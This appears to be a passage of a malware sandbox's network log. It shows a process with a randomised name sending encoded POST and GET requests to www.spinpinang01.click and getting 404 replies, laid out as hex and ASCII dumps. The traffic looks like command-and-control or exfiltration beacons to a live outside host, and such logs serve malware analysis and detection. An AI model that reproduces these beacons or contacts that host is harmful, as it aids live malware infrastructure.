                                                        Jan 11, 2025 02:54:24.351939917 CET1236INData Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6
                                                        Data Ascii: OH_3RymnQ{3/Kzn|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
                                                        Jan 11, 2025 02:54:24.351958036 CET448INData Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d
                                                        Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
                                                        Jan 11, 2025 02:54:24.352143049 CET1236INData Raw: b4 56 62 8f ca d6 fc 7e 46 d1 24 39 d4 b4 19 32 57 8a d5 01 ab c2 8d 67 4f d2 00 09 54 29 37 f9 b5 70 48 18 da c5 f6 63 d2 c0 5b b9 0b b3 90 2f f4 04 4b eb c0 a1 34 9d a5 29 a9 5d e9 f4 06 5d 8c 54 ba dc 57 ac 7a 92 65 7f 9a 43 28 2c 59 dd 51 a0
                                                        Data Ascii: Vb~F$92WgOT)7pHc[/K4)]]TWzeC(,YQs1U!e8g;>QNP$I;ywLP*[%]u>:h#q8'h<=286X"/3_d&mmuyvfu.;+]
                                                        Jan 11, 2025 02:54:24.352159977 CET1080INData Raw: 1c 40 d1 0f 97 f7 e4 09 55 24 e5 08 ed dd 1d 08 98 0e 45 0c c9 51 ab 9a 9e 42 e5 3b c6 46 7c 68 3a 0b 67 66 a8 14 e3 82 68 d0 5d d1 38 fb ca 3a e7 e8 70 b5 64 17 de 2e cf e5 50 e0 86 e1 fa 58 60 23 34 5b 67 91 31 a4 a7 63 83 9c 08 e9 56 6a 5b 32
                                                        Data Ascii: @U$EQB;F|h:gfh]8:pd.PX`#4[g1cVj[2h1h|`\0MXnM]C DuxN.?eB0D fC,Z\u3P5JuT>a)D6C6@7KVcvxXTS)$ZW|XPiFaFSht<>#


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.104998166.29.146.78806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:26.318356991 CET701OUTPOST /01kd/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.spinpinang01.click
                                                        Origin: http://www.spinpinang01.click
                                                        Referer: http://www.spinpinang01.click/01kd/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 4a 45 5a 59 6c 6a 79 74 34 67 78 4b 70 65 69 67 34 30 4a 73 6e 62 37 43 36 7a 4a 65 2b 76 41 48 47 67 4f 37 45 37 31 4d 39 50 6a 62 78 43 41 53 37 4a 48 34 4e 61 76 4f 6e 55 76 32 54 65 7a 55 38 45 6f 58 6a 7a 70 38 4b 6f 6f 31 56 6b 36 4c 69 69 31 43 69 79 51 34 72 72 75 30 35 69 43 75 54 2b 7a 39 54 4c 32 6b 72 4c 75 64 4d 73 79 52 4e 47 71 6f 39 43 76 36 57 4d 73 2b 7a 6a 7a 68 6c 34 5a 51 36 56 4b 59 50 70 43 70 4d 68 6c 72 53 79 58 64 67 43 48 6b 78 48 46 56 6e 34 51 42 47 44 30 6c 33 6b 68 42 4e 43 5a 7a 39 66 71 4a 63 4f 33 41 56 67 79 51 5a 65 36 2f 6e 6d 4c 65 41 50 70 54 46 51 3d 3d
                                                        Data Ascii: 0lTTc=My1WNoSFbjGGJEZYljyt4gxKpeig40Jsnb7C6zJe+vAHGgO7E71M9PjbxCAS7JH4NavOnUv2TezU8EoXjzp8Koo1Vk6Lii1CiyQ4rru05iCuT+z9TL2krLudMsyRNGqo9Cv6WMs+zjzhl4ZQ6VKYPpCpMhlrSyXdgCHkxHFVn4QBGD0l3khBNCZz9fqJcO3AVgyQZe6/nmLeAPpTFQ==
                                                        Jan 11, 2025 02:54:26.896034956 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Sat, 11 Jan 2025 01:54:26 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED]
                                                        Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N*0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? G*yg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
                                                        Jan 11, 2025 02:54:26.896056890 CET1236INData Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6
                                                        Data Ascii: OH_3RymnQ{3/Kzn|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
                                                        Jan 11, 2025 02:54:26.896066904 CET1236INData Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d
                                                        Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
                                                        Jan 11, 2025 02:54:26.896079063 CET1236INData Raw: 9e 98 63 67 b4 21 80 51 ab 4c d3 9e 8f 8b b8 5e 35 01 c7 ac 19 cc 22 a4 53 07 13 46 37 2f 3a ca cf 4e f6 06 31 78 7f 41 9c b0 39 2e 42 46 4c 6e 25 98 68 32 7b 58 ec 22 1a 67 f2 06 4f 0f de 12 4e 03 7d 44 a1 c0 35 2b c3 8a 58 b8 9b 4e eb ea 28 f5
                                                        Data Ascii: cg!QL^5"SF7/:N1xA9.BFLn%h2{X"gON}D5+XN()ZUb]s,h,GHj'0<fsVx3<Og9)Q4vdil4G/z(TRul+Tl2:3pcsreB'4<F]dPvZOZ.it
                                                        Jan 11, 2025 02:54:26.896090031 CET292INData Raw: bb 98 67 63 7b 4b 35 df 0d e0 9f 90 bf 3a d4 75 72 f9 93 b3 5c b3 ff 31 64 3f 43 d4 9f 5e 20 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 63 78 65 f1 f1 b9 a0 f7 5e da bf
                                                        Data Ascii: gc{K5:ur\1d?C^ OEq9{E^o<G|'g9}{?[4}cxe^W#q=@VU2}zn_2V'3!`O}HGV[<$p$-o|g>~/)~g0eCVovM3dKQ:\S@ej


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.104998266.29.146.78806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:28.867861986 CET1714OUTPOST /01kd/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.spinpinang01.click
                                                        Origin: http://www.spinpinang01.click
                                                        Referer: http://www.spinpinang01.click/01kd/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 4a 45 5a 59 6c 6a 79 74 34 67 78 4b 70 65 69 67 34 30 4a 73 6e 62 37 43 36 7a 4a 65 2b 76 59 48 47 79 47 37 46 61 31 4d 38 50 6a 62 2f 69 41 52 37 4a 48 66 4e 61 33 43 6e 55 7a 6d 54 63 37 55 38 6c 49 58 76 57 64 38 46 6f 6f 31 58 6b 36 47 6d 69 30 59 69 79 41 38 72 72 2b 30 35 69 43 75 54 34 2f 39 46 71 32 6b 73 37 75 65 4c 73 79 72 61 57 71 45 39 43 32 46 57 4d 6f 45 7a 58 50 68 72 34 4a 51 71 33 53 59 4d 4a 43 72 5a 68 6c 7a 53 79 61 44 67 44 72 2f 78 45 59 36 6e 2f 6b 42 46 56 64 50 77 56 42 47 54 6a 35 46 35 66 36 76 66 71 37 35 66 52 48 57 5a 2f 32 34 33 53 65 74 57 74 38 4c 5a 74 6c 30 50 48 75 53 51 63 58 35 4d 75 4f 76 30 58 51 66 69 7a 34 61 38 79 4f 73 7a 43 30 41 76 77 5a 67 75 30 61 78 6f 79 57 4d 53 39 7a 54 37 34 47 46 77 75 6f 54 46 35 4c 34 67 72 31 59 41 6a 6a 76 35 39 53 33 4c 39 4a 49 4b 77 73 53 58 66 4d 4f 6c 69 53 34 49 39 4b 58 78 73 65 7a 41 63 48 51 57 2f 4e 72 4c 55 75 53 6e 4a 4e 56 61 74 55 79 63 31 46 34 58 6c 42 41 [TRUNCATED]
                                                        Data Ascii: 0lTTc=My1WNoSFbjGGJEZYljyt4gxKpeig40Jsnb7C6zJe+vYHGyG7Fa1M8Pjb/iAR7JHfNa3CnUzmTc7U8lIXvWd8Foo1Xk6Gmi0YiyA8rr+05iCuT4/9Fq2ks7ueLsyraWqE9C2FWMoEzXPhr4JQq3SYMJCrZhlzSyaDgDr/xEY6n/kBFVdPwVBGTj5F5f6vfq75fRHWZ/243SetWt8LZtl0PHuSQcX5MuOv0XQfiz4a8yOszC0AvwZgu0axoyWMS9zT74GFwuoTF5L4gr1YAjjv59S3L9JIKwsSXfMOliS4I9KXxsezAcHQW/NrLUuSnJNVatUyc1F4XlBAc2BQZKZrYDtrq3vAbkwufbyKOUwglndKBa8dOW5hbn4TV5JJJ2q8MepRP3OmNAbaVYD9sZZkv6ciJc8C7JEJQdaZ5KRB8XkjBrYqP52iTMxIkAKEFJeZj35pG/4DvH2sFN/I23u5OQpJBw3W8EFEtyNV2CN1Vyju7j0NLk5NNXNWb7S7NAuuO2mAIEWFK9A4gwNpQCegACJgq7JqJOYOJCoeaC2VkzVXSsY8tSpLHQXsy9bqO5TI2ga3Ph7cp7YOQPAcMmYdM7S/2upVDf3VLcp1Rkk2mZWUysd3jXFGRlpBDyzoDmV7BKy9Lh2clfHrAc10SIighV+OBX5RcYxPSC+CCBjR24MrFcWOrr3Rch8+Oh8vsqUiHOPvufwpjVeTd6rzEjLpb+NCvqFJhAuffDi6QQx2QV51dJsJ5Ii6qz4tvtLaWokbYpdfYQVk8poi5JBqIU5UK8+zMzbSsnIhuaaNBkyW+Eaup2b/jbPvZy4EPwEk+egEwn9DPoYpO5VRqxQeCpHPEvrNhgu0Fz9IzuaBNeYVy4IHDhPT1xRaeQXwbxHjBQeB+OImG2rYfbP1NAlwt6uZmQVIxhVkg1M+U7s3fC/RF8BFql5lTcmwjIWh4zb5e0eTZc75LUv/KX3ErWLalWKenslbFz0oNbQiBQ5l82Ei+T6Hh9 [TRUNCATED]
                                                        Jan 11, 2025 02:54:29.465712070 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Sat, 11 Jan 2025 01:54:29 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED]
                                                        Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N*0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? G*yg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
                                                        Jan 11, 2025 02:54:29.465744019 CET1236INData Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6
                                                        Data Ascii: OH_3RymnQ{3/Kzn|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
                                                        Jan 11, 2025 02:54:29.465749979 CET1236INData Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d
                                                        Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
                                                        Jan 11, 2025 02:54:29.465754032 CET1236INData Raw: 9e 98 63 67 b4 21 80 51 ab 4c d3 9e 8f 8b b8 5e 35 01 c7 ac 19 cc 22 a4 53 07 13 46 37 2f 3a ca cf 4e f6 06 31 78 7f 41 9c b0 39 2e 42 46 4c 6e 25 98 68 32 7b 58 ec 22 1a 67 f2 06 4f 0f de 12 4e 03 7d 44 a1 c0 35 2b c3 8a 58 b8 9b 4e eb ea 28 f5
                                                        Data Ascii: cg!QL^5"SF7/:N1xA9.BFLn%h2{X"gON}D5+XN()ZUb]s,h,GHj'0<fsVx3<Og9)Q4vdil4G/z(TRul+Tl2:3pcsreB'4<F]dPvZOZ.it
                                                        Jan 11, 2025 02:54:29.465756893 CET292INData Raw: bb 98 67 63 7b 4b 35 df 0d e0 9f 90 bf 3a d4 75 72 f9 93 b3 5c b3 ff 31 64 3f 43 d4 9f 5e 20 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 63 78 65 f1 f1 b9 a0 f7 5e da bf
                                                        Data Ascii: gc{K5:ur\1d?C^ OEq9{E^o<G|'g9}{?[4}cxe^W#q=@VU2}zn_2V'3!`O}HGV[<$p$-o|g>~/)~g0eCVovM3dKQ:\S@ej


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.104998366.29.146.78806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:31.406265020 CET401OUTGET /01kd/?0lTTc=Bwd2OemdLjmJMGV3rhrX5wcyn7e37k0HlZ2ImklC1ZcabiHtTZNjzLKNphAXpIzoErDL03bbR9rC7Ulfl1FOK5c2VAGA3RdE9RsClYyfxzqaNIzCHQ==&LR=KBvPk HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.spinpinang01.click
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Jan 11, 2025 02:54:32.005224943 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        date: Sat, 11 Jan 2025 01:54:31 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                        Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                        Jan 11, 2025 02:54:32.005242109 CET224INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                        Jan 11, 2025 02:54:32.005254030 CET1236INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                        Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                        Jan 11, 2025 02:54:32.005268097 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                        Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                        Jan 11, 2025 02:54:32.005279064 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                        Jan 11, 2025 02:54:32.005290985 CET1236INData Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48
                                                        Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
                                                        Jan 11, 2025 02:54:32.005309105 CET1236INData Raw: 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e
                                                        Data Ascii: MgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsR
                                                        Jan 11, 2025 02:54:32.005326033 CET1120INData Raw: 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64
                                                        Data Ascii: 8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDR
                                                        Jan 11, 2025 02:54:32.005341053 CET1236INData Raw: 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73
